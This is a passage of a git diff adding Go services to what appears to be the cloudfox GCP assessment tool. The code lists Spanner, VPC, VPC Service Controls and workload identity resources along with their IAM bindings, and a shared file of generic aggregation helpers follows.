`json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Config string `json:"config"` + NodeCount int64 `json:"nodeCount"` + State string `json:"state"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerDatabaseInfo struct { + Name string `json:"name"` + FullName string `json:"fullName"` + ProjectID string `json:"projectId"` + InstanceName string `json:"instanceName"` + State string `json:"state"` + EncryptionType string `json:"encryptionType"` + KmsKeyName string `json:"kmsKeyName"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +type SpannerResult struct { + Instances []SpannerInstanceInfo + Databases []SpannerDatabaseInfo +} + +// getService returns a Spanner service client using cached session if available +func (s *SpannerService) getService(ctx context.Context) (*spanner.Service, error) { + if s.session != nil { + return sdk.CachedGetSpannerService(ctx, s.session) + } + return spanner.NewService(ctx) +} + +// ListInstancesAndDatabases retrieves all Spanner instances and databases with IAM bindings +func (s *SpannerService) ListInstancesAndDatabases(projectID string) (*SpannerResult, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + result := &SpannerResult{ + Instances: []SpannerInstanceInfo{}, + Databases: []SpannerDatabaseInfo{}, + } + + parent := fmt.Sprintf("projects/%s", projectID) + + req := service.Projects.Instances.List(parent) + err = req.Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := SpannerInstanceInfo{ + Name: extractName(instance.Name), + FullName: instance.Name, + ProjectID: projectID, + DisplayName: instance.DisplayName, + Config: extractName(instance.Config), + NodeCount: instance.NodeCount, + State: instance.State, + } + + // Get IAM bindings for this instance + info.IAMBindings = s.getInstanceIAMBindings(service, ctx, instance.Name) + + result.Instances = append(result.Instances, info) + + // Get databases for this instance + databases := s.listDatabases(service, ctx, instance.Name, projectID) + result.Databases = append(result.Databases, databases...) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return result, nil +} + +// getInstanceIAMBindings retrieves IAM bindings for an instance +func (s *SpannerService) getInstanceIAMBindings(service *spanner.Service, ctx context.Context, instanceName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.GetIamPolicy(instanceName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// listDatabases retrieves all databases for an instance with their IAM bindings +func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Context, instanceName string, projectID string) []SpannerDatabaseInfo { + var databases []SpannerDatabaseInfo + + req := service.Projects.Instances.Databases.List(instanceName) + err := req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + for _, db := range page.Databases { + dbInfo := SpannerDatabaseInfo{ + Name: extractName(db.Name), + FullName: db.Name, + ProjectID: projectID, + InstanceName: extractName(instanceName), + State: db.State, + } + + // Determine encryption type + if db.EncryptionConfig != nil && db.EncryptionConfig.KmsKeyName != "" { + dbInfo.EncryptionType = "CMEK" + dbInfo.KmsKeyName = db.EncryptionConfig.KmsKeyName + } else { + dbInfo.EncryptionType = "Google-managed" + } + + // Get IAM bindings for this database + dbInfo.IAMBindings = s.getDatabaseIAMBindings(service, ctx, db.Name) + + databases = append(databases, dbInfo) + } + return nil + }) + if err != nil { + // Log but don't fail - return whatever we collected + return databases + } + + return databases +} + +// getDatabaseIAMBindings retrieves IAM bindings for a database +func (s *SpannerService) getDatabaseIAMBindings(service *spanner.Service, ctx context.Context, databaseName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Instances.Databases.GetIamPolicy(databaseName, &spanner.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/vpcService/vpcService.go b/gcp/services/vpcService/vpcService.go new file mode 100644 index 00000000..a5ddb1d9 --- /dev/null +++ b/gcp/services/vpcService/vpcService.go @@ -0,0 +1,309 @@ +package vpcservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type VPCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCService { + return &VPCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCService { + return &VPCService{session: session} +} + +// getService returns a Compute service client using cached session if available +func (s *VPCService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// VPCNetworkInfo represents a VPC network +type VPCNetworkInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Description string `json:"description"` + AutoCreateSubnetworks bool `json:"autoCreateSubnetworks"` + RoutingMode string `json:"routingMode"` // REGIONAL or GLOBAL + MTU int64 `json:"mtu"` + Subnetworks []string `json:"subnetworks"` + Peerings []string `json:"peerings"` + FirewallPolicyCount int `json:"firewallPolicyCount"` +} + +// SubnetInfo represents a subnetwork +type SubnetInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Region string `json:"region"` + IPCidrRange string `json:"ipCidrRange"` + GatewayAddress string `json:"gatewayAddress"` + PrivateIPGoogleAccess bool `json:"privateIpGoogleAccess"` + Purpose string `json:"purpose"` + EnableFlowLogs bool `json:"enableFlowLogs"` + SecondaryIPRanges []string `json:"secondaryIpRanges"` +} + +// VPCPeeringInfo represents a VPC peering connection +type VPCPeeringInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + PeerNetwork string `json:"peerNetwork"` + PeerProjectID string `json:"peerProjectId"` + State string `json:"state"` + ExportCustomRoutes bool `json:"exportCustomRoutes"` + ImportCustomRoutes bool `json:"importCustomRoutes"` + ExchangeSubnetRoutes bool `json:"exchangeSubnetRoutes"` +} + +// RouteInfo represents a route +type RouteInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + DestRange string `json:"destRange"` + NextHopType string `json:"nextHopType"` + NextHop string `json:"nextHop"` + Priority int64 `json:"priority"` + Tags []string `json:"tags"` +} + +// ListVPCNetworks retrieves all VPC networks +func (s *VPCService) ListVPCNetworks(projectID string) ([]VPCNetworkInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var networks []VPCNetworkInfo + + resp, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range resp.Items { + info := s.parseNetwork(network, projectID) + networks = append(networks, info) + } + + return networks, nil +} + +// ListSubnets retrieves all subnets +func (s *VPCService) ListSubnets(projectID string) ([]SubnetInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var subnets []SubnetInfo + + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for _, scopedList := range page.Items { + for _, subnet := range scopedList.Subnetworks { + info := s.parseSubnet(subnet, projectID) + subnets = append(subnets, info) + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + return subnets, nil +} + +// ListVPCPeerings retrieves all VPC peering connections +func (s *VPCService) ListVPCPeerings(projectID string) ([]VPCPeeringInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var peerings []VPCPeeringInfo + + networks, err := service.Networks.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, network := range networks.Items { + for _, peering := range network.Peerings { + // Extract peer project ID from the full network path + peerProjectID := extractProjectFromNetwork(peering.Network) + + info := VPCPeeringInfo{ + Name: peering.Name, + ProjectID: projectID, + Network: network.Name, + PeerNetwork: extractName(peering.Network), + PeerProjectID: peerProjectID, + State: peering.State, + ExportCustomRoutes: peering.ExportCustomRoutes, + ImportCustomRoutes: peering.ImportCustomRoutes, + ExchangeSubnetRoutes: peering.ExchangeSubnetRoutes, + } + peerings = append(peerings, info) + } + } + + return peerings, nil +} + +// ListRoutes retrieves all routes +func (s *VPCService) ListRoutes(projectID string) ([]RouteInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var routes []RouteInfo + + resp, err := service.Routes.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, route := range resp.Items { + info := s.parseRoute(route, projectID) + routes = append(routes, info) + } + + return routes, nil +} + +func (s *VPCService) parseNetwork(network *compute.Network, projectID string) VPCNetworkInfo { + info := VPCNetworkInfo{ + Name: network.Name, + ProjectID: projectID, + Description: network.Description, + AutoCreateSubnetworks: network.AutoCreateSubnetworks, + RoutingMode: network.RoutingConfig.RoutingMode, + MTU: network.Mtu, + } + + for _, subnet := range network.Subnetworks { + info.Subnetworks = append(info.Subnetworks, extractName(subnet)) + } + + for _, peering := range network.Peerings { + info.Peerings = append(info.Peerings, peering.Name) + } + + return info +} + +func (s *VPCService) parseSubnet(subnet *compute.Subnetwork, projectID string) SubnetInfo { + info := SubnetInfo{ + Name: subnet.Name, + ProjectID: projectID, + Network: extractName(subnet.Network), + Region: extractRegion(subnet.Region), + IPCidrRange: subnet.IpCidrRange, + GatewayAddress: subnet.GatewayAddress, + PrivateIPGoogleAccess: subnet.PrivateIpGoogleAccess, + Purpose: subnet.Purpose, + } + + if subnet.LogConfig != nil { + info.EnableFlowLogs = subnet.LogConfig.Enable + } + + for _, secondary := range subnet.SecondaryIpRanges { + info.SecondaryIPRanges = append(info.SecondaryIPRanges, fmt.Sprintf("%s:%s", secondary.RangeName, secondary.IpCidrRange)) + } + + return info +} + +func (s *VPCService) parseRoute(route *compute.Route, projectID string) RouteInfo { + info := RouteInfo{ + Name: route.Name, + ProjectID: projectID, + Network: extractName(route.Network), + DestRange: route.DestRange, + Priority: route.Priority, + Tags: route.Tags, + } + + // Determine next hop type + if route.NextHopGateway != "" { + info.NextHopType = "gateway" + info.NextHop = extractName(route.NextHopGateway) + } else if route.NextHopInstance != "" { + info.NextHopType = "instance" + info.NextHop = extractName(route.NextHopInstance) + } else if route.NextHopIp != "" { + info.NextHopType = "ip" + info.NextHop = route.NextHopIp + } else if route.NextHopNetwork != "" { + info.NextHopType = "network" + info.NextHop = extractName(route.NextHopNetwork) + } else if route.NextHopPeering != "" { + info.NextHopType = "peering" + info.NextHop = route.NextHopPeering + } else if route.NextHopIlb != "" { + info.NextHopType = "ilb" + info.NextHop = extractName(route.NextHopIlb) + } else if route.NextHopVpnTunnel != "" { + info.NextHopType = "vpn_tunnel" + info.NextHop = extractName(route.NextHopVpnTunnel) + } + + return info +} + +func extractProjectFromNetwork(networkPath string) string { + // Format: https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network} + // or: projects/{project}/global/networks/{network} + parts := strings.Split(networkPath, "/") + for i, part := range parts { + if part == "projects" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} + +func extractRegion(fullPath string) string { + parts := strings.Split(fullPath, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + return fullPath +} diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go new file mode 100644 index 00000000..45a08915 --- /dev/null +++ b/gcp/services/vpcscService/vpcscService.go @@ -0,0 +1,247 @@ +package vpcscservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" +) + +type VPCSCService struct { + session *gcpinternal.SafeSession +} + +func New() *VPCSCService { + return &VPCSCService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *VPCSCService { + return &VPCSCService{session: session} +} + +// getService returns an Access Context Manager service client using cached session if available +func (s *VPCSCService) getService(ctx context.Context) (*accesscontextmanager.Service, error) { + if s.session != nil { + return sdk.CachedGetAccessContextManagerService(ctx, s.session) + } + return accesscontextmanager.NewService(ctx) +} + +// AccessPolicyInfo represents an access policy +type AccessPolicyInfo struct { + Name string `json:"name"` + Title string `json:"title"` + Parent string `json:"parent"` + Etag string `json:"etag"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` +} + +// ServicePerimeterInfo represents a VPC Service Control perimeter +type ServicePerimeterInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + PerimeterType string `json:"perimeterType"` // PERIMETER_TYPE_REGULAR or PERIMETER_TYPE_BRIDGE + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Status configuration + Resources []string `json:"resources"` // Projects in the perimeter + RestrictedServices []string `json:"restrictedServices"` // Services protected + AccessLevels []string `json:"accessLevels"` // Access levels allowed + VPCAccessibleServices []string `json:"vpcAccessibleServices"` + + // Ingress/Egress policies + IngressPolicyCount int `json:"ingressPolicyCount"` + EgressPolicyCount int `json:"egressPolicyCount"` + HasIngressRules bool `json:"hasIngressRules"` + HasEgressRules bool `json:"hasEgressRules"` +} + +// AccessLevelInfo represents an access level +type AccessLevelInfo struct { + Name string `json:"name"` + Title string `json:"title"` + PolicyName string `json:"policyName"` + Description string `json:"description"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Conditions + IPSubnetworks []string `json:"ipSubnetworks"` + Regions []string `json:"regions"` + Members []string `json:"members"` +} + +// ListAccessPolicies retrieves all access policies for an organization +func (s *VPCSCService) ListAccessPolicies(orgID string) ([]AccessPolicyInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var policies []AccessPolicyInfo + + // List access policies for the organization + parent := fmt.Sprintf("organizations/%s", orgID) + req := service.AccessPolicies.List().Parent(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessPoliciesResponse) error { + for _, policy := range page.AccessPolicies { + info := AccessPolicyInfo{ + Name: extractPolicyName(policy.Name), + Title: policy.Title, + Parent: policy.Parent, + Etag: policy.Etag, + } + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return policies, nil +} + +// ListServicePerimeters retrieves all service perimeters for an access policy +func (s *VPCSCService) ListServicePerimeters(policyName string) ([]ServicePerimeterInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var perimeters []ServicePerimeterInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.ServicePerimeters.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListServicePerimetersResponse) error { + for _, perimeter := range page.ServicePerimeters { + info := s.parsePerimeter(perimeter, policyName) + perimeters = append(perimeters, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return perimeters, nil +} + +// ListAccessLevels retrieves all access levels for an access policy +func (s *VPCSCService) ListAccessLevels(policyName string) ([]AccessLevelInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + var levels []AccessLevelInfo + + parent := fmt.Sprintf("accessPolicies/%s", policyName) + req := service.AccessPolicies.AccessLevels.List(parent) + err = req.Pages(ctx, func(page *accesscontextmanager.ListAccessLevelsResponse) error { + for _, level := range page.AccessLevels { + info := s.parseAccessLevel(level, policyName) + levels = append(levels, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "accesscontextmanager.googleapis.com") + } + + return levels, nil +} + +func (s *VPCSCService) parsePerimeter(perimeter *accesscontextmanager.ServicePerimeter, policyName string) ServicePerimeterInfo { + info := ServicePerimeterInfo{ + Name: extractPerimeterName(perimeter.Name), + Title: perimeter.Title, + PolicyName: policyName, + PerimeterType: perimeter.PerimeterType, + Description: perimeter.Description, + } + + // Parse status configuration + if perimeter.Status != nil { + info.Resources = perimeter.Status.Resources + info.RestrictedServices = perimeter.Status.RestrictedServices + info.AccessLevels = perimeter.Status.AccessLevels + + if perimeter.Status.VpcAccessibleServices != nil { + info.VPCAccessibleServices = perimeter.Status.VpcAccessibleServices.AllowedServices + } + + if len(perimeter.Status.IngressPolicies) > 0 { + info.IngressPolicyCount = len(perimeter.Status.IngressPolicies) + info.HasIngressRules = true + } + + if len(perimeter.Status.EgressPolicies) > 0 { + info.EgressPolicyCount = len(perimeter.Status.EgressPolicies) + info.HasEgressRules = true + } + } + + return info +} + +func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, policyName string) AccessLevelInfo { + info := AccessLevelInfo{ + Name: extractLevelName(level.Name), + Title: level.Title, + PolicyName: policyName, + Description: level.Description, + } + + if level.Basic != nil && len(level.Basic.Conditions) > 0 { + for _, condition := range level.Basic.Conditions { + info.IPSubnetworks = append(info.IPSubnetworks, condition.IpSubnetworks...) + info.Regions = append(info.Regions, condition.Regions...) + info.Members = append(info.Members, condition.Members...) + } + } + + // Handle custom access levels (CEL expressions) + if level.Custom != nil && level.Custom.Expr != nil && level.Custom.Expr.Expression != "" { + info.Description = fmt.Sprintf("Custom CEL: %s", level.Custom.Expr.Expression) + } + + return info +} + +func extractPolicyName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractPerimeterName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLevelName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/workloadIdentityService/workloadIdentityService.go b/gcp/services/workloadIdentityService/workloadIdentityService.go new file mode 100644 index 00000000..d2f4206b --- /dev/null +++ b/gcp/services/workloadIdentityService/workloadIdentityService.go @@ -0,0 +1,244 @@ +package workloadidentityservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + iam "google.golang.org/api/iam/v1" +) + +type WorkloadIdentityService struct{ + session *gcpinternal.SafeSession +} + +func New() *WorkloadIdentityService { + return &WorkloadIdentityService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *WorkloadIdentityService { + return &WorkloadIdentityService{ + session: session, + } +} + +// getIAMService returns an IAM service client using cached session if available +func (s *WorkloadIdentityService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// WorkloadIdentityPool represents a Workload Identity Pool +type WorkloadIdentityPool struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + ProjectID string `json:"projectId"` + State string `json:"state"` + Disabled bool `json:"disabled"` + PoolID string `json:"poolId"` +} + +// WorkloadIdentityProvider represents a Workload Identity Pool Provider +type WorkloadIdentityProvider struct { + Name string `json:"name"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + ProjectID string `json:"projectId"` + ProviderType string `json:"providerType"` // aws, oidc, saml + Disabled bool `json:"disabled"` + AttributeMapping map[string]string `json:"attributeMapping"` + AttributeCondition string `json:"attributeCondition"` // CEL expression + // AWS specific + AWSAccountID string `json:"awsAccountId"` + // OIDC specific + OIDCIssuerURI string `json:"oidcIssuerUri"` + AllowedAudiences []string `json:"allowedAudiences"` +} + +// FederatedIdentityBinding represents a binding from federated identity to GCP SA +type FederatedIdentityBinding struct { + ProjectID string `json:"projectId"` + PoolID string `json:"poolId"` + ProviderID string `json:"providerId"` + GCPServiceAccount string `json:"gcpServiceAccount"` + ExternalSubject string `json:"externalSubject"` + AttributeCondition string `json:"attributeCondition"` +} + +// ListWorkloadIdentityPools lists all Workload Identity Pools in a project +func (s *WorkloadIdentityService) ListWorkloadIdentityPools(projectID string) ([]WorkloadIdentityPool, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var pools []WorkloadIdentityPool + parent := fmt.Sprintf("projects/%s/locations/global", projectID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolsResponse) error { + for _, pool := range page.WorkloadIdentityPools { + // Extract pool ID from name + // Format: projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID + poolID := extractLastPart(pool.Name) + + pools = append(pools, WorkloadIdentityPool{ + Name: pool.Name, + DisplayName: pool.DisplayName, + Description: pool.Description, + ProjectID: projectID, + State: pool.State, + Disabled: pool.Disabled, + PoolID: poolID, + }) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return pools, nil +} + +// ListWorkloadIdentityProviders lists all providers in a pool +func (s *WorkloadIdentityService) ListWorkloadIdentityProviders(projectID, poolID string) ([]WorkloadIdentityProvider, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var providers []WorkloadIdentityProvider + parent := fmt.Sprintf("projects/%s/locations/global/workloadIdentityPools/%s", projectID, poolID) + + req := iamService.Projects.Locations.WorkloadIdentityPools.Providers.List(parent) + err = req.Pages(ctx, func(page *iam.ListWorkloadIdentityPoolProvidersResponse) error { + for _, provider := range page.WorkloadIdentityPoolProviders { + // Extract provider ID from name + providerID := extractLastPart(provider.Name) + + wip := WorkloadIdentityProvider{ + Name: provider.Name, + DisplayName: provider.DisplayName, + Description: provider.Description, + PoolID: poolID, + ProviderID: providerID, + ProjectID: projectID, + Disabled: provider.Disabled, + AttributeMapping: provider.AttributeMapping, + AttributeCondition: provider.AttributeCondition, + } + + // Determine provider type and extract specific config + if provider.Aws != nil { + wip.ProviderType = "AWS" + wip.AWSAccountID = provider.Aws.AccountId + } else if provider.Oidc != nil { + wip.ProviderType = "OIDC" + wip.OIDCIssuerURI = provider.Oidc.IssuerUri + wip.AllowedAudiences = provider.Oidc.AllowedAudiences + } else if provider.Saml != nil { + wip.ProviderType = "SAML" + } + + providers = append(providers, wip) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return providers, nil +} + +// FindFederatedIdentityBindings finds all service accounts with federated identity bindings +func (s *WorkloadIdentityService) FindFederatedIdentityBindings(projectID string, pools []WorkloadIdentityPool) ([]FederatedIdentityBinding, error) { + ctx := context.Background() + + iamService, err := s.getIAMService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + var bindings []FederatedIdentityBinding + + // List all service accounts + parent := fmt.Sprintf("projects/%s", projectID) + saReq := iamService.Projects.ServiceAccounts.List(parent) + err = saReq.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + // Get IAM policy for this service account + policyReq := iamService.Projects.ServiceAccounts.GetIamPolicy(sa.Name) + policy, pErr := policyReq.Do() + if pErr != nil { + continue + } + + // Look for federated identity bindings + for _, binding := range policy.Bindings { + if binding.Role == "roles/iam.workloadIdentityUser" { + for _, member := range binding.Members { + // Check if this is a federated identity + // Format: principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // Or: principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + if strings.HasPrefix(member, "principal://") || strings.HasPrefix(member, "principalSet://") { + fib := s.parseFederatedIdentityBinding(member, sa.Email, projectID) + if fib != nil { + bindings = append(bindings, *fib) + } + } + } + } + } + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") + } + + return bindings, nil +} + +// parseFederatedIdentityBinding parses a federated identity member string +func (s *WorkloadIdentityService) parseFederatedIdentityBinding(member, gcpSA, projectID string) *FederatedIdentityBinding { + // principal://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/subject/SUBJECT + // principalSet://iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL_ID/attribute.ATTR/VALUE + + fib := &FederatedIdentityBinding{ + ProjectID: projectID, + GCPServiceAccount: gcpSA, + ExternalSubject: member, + } + + // Extract pool ID + if idx := strings.Index(member, "workloadIdentityPools/"); idx != -1 { + rest := member[idx+len("workloadIdentityPools/"):] + if slashIdx := strings.Index(rest, "/"); slashIdx != -1 { + fib.PoolID = rest[:slashIdx] + } + } + + return fib +} + +// extractLastPart extracts the last part of a resource name +func extractLastPart(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/shared/aggregate.go b/gcp/shared/aggregate.go new file mode 100644 index 00000000..9eb87fc5 --- /dev/null +++ b/gcp/shared/aggregate.go @@ -0,0 +1,239 @@ +package shared + +// AggregateFromProjects combines items from a per-project map into a single slice. +// This is a common pattern in GCP modules where data is collected per-project +// and then needs to be aggregated for output. +// +// Note: Go generics require Go 1.18+. If you need to support older versions, +// use the type-specific functions below or copy this pattern. +// +// Example usage: +// +// projectBuckets := map[string][]BucketInfo{ +// "project-a": {bucket1, bucket2}, +// "project-b": {bucket3}, +// } +// allBuckets := AggregateFromProjects(projectBuckets) +// // Result: []BucketInfo{bucket1, bucket2, bucket3} +func AggregateFromProjects[T any](projectMap map[string][]T) []T { + var result []T + for _, items := range projectMap { + result = append(result, items...) + } + return result +} + +// AggregateWithProject combines items from a per-project map and adds project context. +// The transform function receives the project ID and item, allowing you to +// enrich or transform items as they're aggregated. +// +// Example usage: +// +// type EnrichedItem struct { +// ProjectID string +// Name string +// } +// allItems := AggregateWithProject(projectMap, func(projectID string, item Item) EnrichedItem { +// return EnrichedItem{ProjectID: projectID, Name: item.Name} +// }) +func AggregateWithProject[T any, R any](projectMap map[string][]T, transform func(projectID string, item T) R) []R { + var result []R + for projectID, items := range projectMap { + for _, item := range items { + result = append(result, transform(projectID, item)) + } + } + return result +} + +// CountByProject returns a count of items per project +func CountByProject[T any](projectMap map[string][]T) map[string]int { + counts := make(map[string]int) + for projectID, items := range projectMap { + counts[projectID] = len(items) + } + return counts +} + +// TotalCount returns the total count across all projects +func TotalCount[T any](projectMap map[string][]T) int { + total := 0 + for _, items := range projectMap { + total += len(items) + } + return total +} + +// FilterByProject returns items only from specified projects +func FilterByProject[T any](projectMap map[string][]T, projectIDs []string) []T { + projectSet := make(map[string]bool) + for _, pid := range projectIDs { + projectSet[pid] = true + } + + var result []T + for projectID, items := range projectMap { + if projectSet[projectID] { + result = append(result, items...) + } + } + return result +} + +// FilterItems returns items that match the predicate +func FilterItems[T any](items []T, predicate func(T) bool) []T { + var result []T + for _, item := range items { + if predicate(item) { + result = append(result, item) + } + } + return result +} + +// MapItems transforms each item using the provided function +func MapItems[T any, R any](items []T, transform func(T) R) []R { + result := make([]R, len(items)) + for i, item := range items { + result[i] = transform(item) + } + return result +} + +// GroupBy groups items by a key extracted from each item +func GroupBy[T any, K comparable](items []T, keyFunc func(T) K) map[K][]T { + result := make(map[K][]T) + for _, item := range items { + key := keyFunc(item) + result[key] = append(result[key], item) + } + return result +} + +// UniqueStrings returns unique strings from a slice +func UniqueStrings(items []string) []string { + seen := make(map[string]bool) + var result []string + for _, item := range items { + if !seen[item] { + seen[item] = true + result = append(result, item) + } + } + return result +} + +// FlattenStringSlices flattens a slice of string slices into a single slice +func FlattenStringSlices(slices [][]string) []string { + var result []string + for _, slice := range slices { + result = append(result, slice...) + } + return result +} + +// CountByField counts items grouped by a field value +func CountByField[T any](items []T, fieldFunc func(T) string) map[string]int { + counts := make(map[string]int) + for _, item := range items { + key := fieldFunc(item) + counts[key]++ + } + return counts +} + +// SortedKeys returns the keys of a map in sorted order +// Note: This only works with string keys +func SortedKeys(m map[string]int) []string { + keys := make([]string, 0, len(m)) + for k := range m { + keys = append(keys, k) + } + // Simple bubble sort for small maps + for i := 0; i < len(keys); i++ { + for j := i + 1; j < len(keys); j++ { + if keys[i] > keys[j] { + keys[i], keys[j] = keys[j], keys[i] + } + } + } + return keys +} + +// First returns the first item matching the predicate, or nil if none found +func First[T any](items []T, predicate func(T) bool) *T { + for i := range items { + if predicate(items[i]) { + return &items[i] + } + } + return nil +} + +// Any returns true if any item matches the predicate +func Any[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if predicate(item) { + return true + } + } + return false +} + +// All returns true if all items match the predicate +func All[T any](items []T, predicate func(T) bool) bool { + for _, item := range items { + if !predicate(item) 